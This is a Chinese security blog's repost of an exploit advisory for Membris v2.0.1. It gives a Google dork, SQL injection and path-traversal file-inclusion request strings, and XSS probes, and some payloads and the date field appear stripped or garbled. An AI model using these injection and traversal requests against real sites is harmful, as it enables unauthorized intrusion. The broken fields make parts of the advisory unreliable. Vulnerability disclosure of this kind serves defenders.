Membris v 2.0.1 Sql XSS &文件暴露

# Exploit:Membris v 2.0.1 Sql XSS & 文件暴露
# Google Dork: Powered by Membris v 2.0.1
# Date: Dr.abolalh
# Version: Membris v 2.0.1
###################################

# Exploit-DB Note:
# Application also suffers from
# stored XSS in the messaging system.
# Insert
# in the message body.

SQL:
voir-actualites.php

Exploit:
voir-actualites.php?idn=1 ‘

+———————————————————–+

File Inclusion

include (“../plugins/” . $_GET[‘acces’] . “/fonctions.php”);

Exploit:
admin/actions-plugin.php�acces=../index.php

+———————————————————–+

XSS
search.php

Exploit:
search.php?req= XSS

search.php?req=’–>


+———————————————————–+

本文固定链接: https://www.unhonker.com/technical/654.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2012年06月03日发表在 技术文章, 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Membris v 2.0.1 Sql XSS &文件暴露 | 90' s Blog|关注网络信息安全

Membris v 2.0.1 Sql XSS &文件暴露:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!